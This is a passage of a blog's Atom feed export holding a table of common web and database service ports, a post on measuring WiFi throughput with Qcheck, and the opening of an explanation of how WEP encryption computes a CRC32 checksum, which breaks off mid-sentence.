&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;1521–1530 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Oracle 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;1944 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Microsoft SQL Server 
7 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;2301 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span lang="EN-GB" style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Compaq 
Insight Manager, Compaq Survey Utility &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;3128 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span lang="EN-GB" style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;HTTP 
Proxy (Squid, NetCache, etc.) &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;3306 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;mySQL 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;4000 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Oracle WebCache 
Listener &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;4001 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Oracle WebCache 
Listener &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;4002 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Oracle WebCache 
Listener &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;4100 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Sybase 11.0 
(jConnect) &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;5000 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Sybase 12.x 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;5432 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;PostgreSQL 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;5800 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;VNC HTTP Console 
Port #1 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;5801 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;VNC HTTP Console 
Port #2 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;5802 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;VNC HTTP Console 
Port #3 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;6346 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Gnutella (HTTP-like 
protocol) &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;6347 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Gnutella (HTTP-like 
protocol) &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;7001 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;BEA WebLogic 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;7002 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;BEA WebLogic 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;8000 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;HTTP Proxy, 
Alternative HTTP Port, HP Web JetAdmin Version 6.0 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;8001 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;BEA WebLogic 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Port 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Server 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;8005 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Apache Tomcat 
Administration Server (non-HTTP protocol) &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;8080 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;HTTP Proxy, 
Alternative HTTP Port &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;8888 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;HTTP Proxy, 
Alternative HTTP Port &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;30821 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Netscape Enterprise 
Server Administration Server &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="MsoNormal"&gt;
 &lt;/div&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;If you know any other ports, please do add them as comment. :)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-3014433263665545741?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/3014433263665545741/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/11/complete-list-of-web-and-database-ports.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3014433263665545741?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3014433263665545741?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/11/complete-list-of-web-and-database-ports.html' title='Complete list of Web and Database Ports'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CEYFRng5eyp7ImA9WhRREE8.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-4916466494383476738</id><published>2011-11-22T20:12:00.001-08:00</published><updated>2011-11-22T20:21:57.623-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-11-22T20:21:57.623-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='HackTools'/><category scheme='http://www.blogger.com/atom/ns#' term='WIFI Hacks'/><category scheme='http://www.blogger.com/atom/ns#' term='FreeDownloads'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='concepts'/><title>Check WiFi Network Performance with Qcheck to Help Improve Throughput</title><content type='html'>&lt;div class="docText"&gt;
&lt;a href="" name="winxphks2-CHP-7-ITERM-3064"&gt;&lt;/a&gt;&lt;a href="" name="winxphks2-CHP-7-ITERM-3065"&gt;&lt;/a&gt;&lt;a href="" name="winxphks2-CHP-7-ITERM-3066"&gt;&lt;/a&gt;When 
you buy network hardware, including a hub/router and network cards, you're told 
that hardware's rated speedfor example, 100Mbps for an Ethernet network, or 
11Mpbs for an 802.11b WiFi network.&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
But those numbers only tell you how your network might perform 
in ideal conditions; as the saying goes, "your mileage may vary," and it usually 
does. WiFi networks are particularly finicky and are especially prone to being 
affected by interference and other factors. Where you place your wireless access 
point and PCs and how you position their antennas can make a dramatic difference in the 
actual speed of your network. So, you'll want to know the true connection speed 
of your network, WiFi networks in particular, so that you can optimize their 
performance when you troubleshoot them.&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
But how can you find out your true network performance? If you 
have a WiFi card, you can find information about your connection by clicking the 
small network icon in the &lt;a href="" name="winxphks2-CHP-7-ITERM-3067"&gt;&lt;/a&gt;&lt;a href="" name="winxphks2-CHP-7-ITERM-3068"&gt;&lt;/a&gt;Notification Area (also called the system 
tray). When you do that, the Wireless Network Connection Status screen appears.&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/--0-YFUTL1C8/Tsx0ddcTM6I/AAAAAAAAA6o/Q5Y9LJjppJw/s1600/2mhv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Ry79k-xupco/Tsx0cZishSI/AAAAAAAAA6g/DZgRHGQstoA/s1600/1mhv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://4.bp.blogspot.com/-Ry79k-xupco/Tsx0cZishSI/AAAAAAAAA6g/DZgRHGQstoA/s640/1mhv.png" width="476" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
There's only one problem with that screen: it's highly 
inaccurate. True, its little green bars and Signal Strength indication give you 
a broad picture of the relative strength of your network connection. But the 
Speed indication isn't an actual measurement as far as I can tell; it appears to 
tell you only your maximum theoretical connection speed, given the nature of 
your hardware, and doesn't reflect your true current connection speed. When I 
use my WiFi network, it always tells me the speed is 11Mbps, even when actual, 
real-time measurement shows my true throughput is less than half of that.&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
So, how do you measure the true speed of a network in your 
real-world conditions? Get &lt;a href="" name="winxphks2-CHP-7-ITERM-3069"&gt;&lt;/a&gt;the free 
program Qcheck (&lt;a class="docLink" href="http://www.ixiacom.com/products/performance_applications/pa_display.php?skey=pa_q_check" target="_blank"&gt;http://www.ixiacom.com/products/performance_applications/pa_display.php?skey=pa_q_check&lt;/a&gt;).&amp;nbsp;&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/--0-YFUTL1C8/Tsx0ddcTM6I/AAAAAAAAA6o/Q5Y9LJjppJw/s1600/2mhv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://3.bp.blogspot.com/--0-YFUTL1C8/Tsx0ddcTM6I/AAAAAAAAA6o/Q5Y9LJjppJw/s640/2mhv.png" width="388" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
It performs a series of tests, including throughput and response time, and gives 
you a good snapshot of your network's real performance. When trying to optimize 
a WiFi network, run Qcheck on each PC on the network to get baseline performance 
results for each. Then run the test for each PC after you move the base station 
and PCs, change the positioning of the antennas, and so forth, as outlined in&lt;a class="docLink" href="http://draft.blogger.com/winxphks2-CHP-7-SECT-3.html#winxphks2-CHP-7-SECT-3"&gt;&lt;span class="docEmphBold"&gt;&lt;/span&gt;&lt;/a&gt;. That way, you'll be able to fine-tune 
your network for optimum efficiency.&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="docText"&gt;
Once installed on every machine in your network, Qcheck 
measures the performance of the network between any two of your PCs. Qcheck is 
made up of two components: the console where you run your tests, and an endpoint, 
which runs invisibly in the background on each PC on which you've installed 
Qcheck. While the exact metrics vary from test to test, the program works by 
sending data from one PC to another on your network. The data is then sent from 
the receiving PC back to the originating PC, and Qcheck measures the round-trip 
time, calculates throughput, and displays the results.&lt;/div&gt;
&lt;div class="docText"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-4916466494383476738?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/4916466494383476738/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/11/check-wifi-network-performance-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/4916466494383476738?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/4916466494383476738?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/11/check-wifi-network-performance-with.html' title='Check WiFi Network Performance with Qcheck to Help Improve Throughput'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-Ry79k-xupco/Tsx0cZishSI/AAAAAAAAA6g/DZgRHGQstoA/s72-c/1mhv.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DEMGQXg7cCp7ImA9WhRSE00.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-8169712453036753061</id><published>2011-11-14T13:21:00.001-08:00</published><updated>2011-11-14T13:33:40.608-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-11-14T13:33:40.608-08:00</app:edited><title>WEP In a Nutshell</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-zWuRazInxOY/Tos7op5YtHI/AAAAAAAABcg/-lu3ODc0lMU/s1600/wep.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-zWuRazInxOY/Tos7op5YtHI/AAAAAAAABcg/-lu3ODc0lMU/s1600/wep.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
WEP [Wireless Equivalent Privacy] was meant to be an encryption method to provide security 
equivalent to a wired access point. WEP was originally designed with 40-bit 
keys, and later WEP2 came along to increase the key size to 104 bits. At that time, it was the best encryption technology avalable. However with passage of time, it has been proved to be damn vulnerable and hence WPA 2 has holded the position of most secure wifi security technology.&amp;nbsp;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
Neways, lets discuss WEP. All of the 
encryption is done on a per-packet basis, so each packet is essentially a 
separate plaintext message to send. The packet will be called &lt;i class="emphasis"&gt;M&lt;/i&gt;.&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="para"&gt;
First a checksum of message &lt;i class="emphasis"&gt;M&lt;/i&gt; is computed so 
the message integrity can be checked later. This is done using a 32-bit cyclic 
redundancy checksum function aptly named CRC32. This checksum will be called &lt;i class="emphasis"&gt;CS&lt;/i&gt;, so &lt;i class="emphasis"&gt;CS&lt;/i&gt; = CRC32(&lt;i class="emphasis"&gt;M&lt;/i&gt;). This value is appended to the end of the message, which 
makes up the plaintext message &lt;i class="emphasis"&gt;P&lt;/i&gt;.&lt;/div&gt;
&lt;div class="informalfigure"&gt;
&lt;span class="figuremediaobject"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-wSVFH4KRxa0/TsGHhwfBtpI/AAAAAAAAA0E/z5CO9q74wHw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&amp;nbsp;&lt;a href="http://1.bp.blogspot.com/-J1lMnt7tU0M/TsGHjGifiBI/AAAAAAAAA0Q/61ZwoMcAbZU/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="129" src="http://1.bp.blogspot.com/-J1lMnt7tU0M/TsGHjGifiBI/AAAAAAAAA0Q/61ZwoMcAbZU/s320/11.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="informalfigure"&gt;
&lt;span class="figuremediaobject"&gt;&amp;nbsp;&lt;a href="http://draft.blogger.com/images/figu212%5F1%5F0%2Ejpg" name="IMG_24" target="_parent"&gt;&amp;nbsp;&lt;/a&gt;&lt;/span&gt; 
&lt;/div&gt;
&lt;div class="para"&gt;
Now the plaintext message needs to be encrypted. This is done 
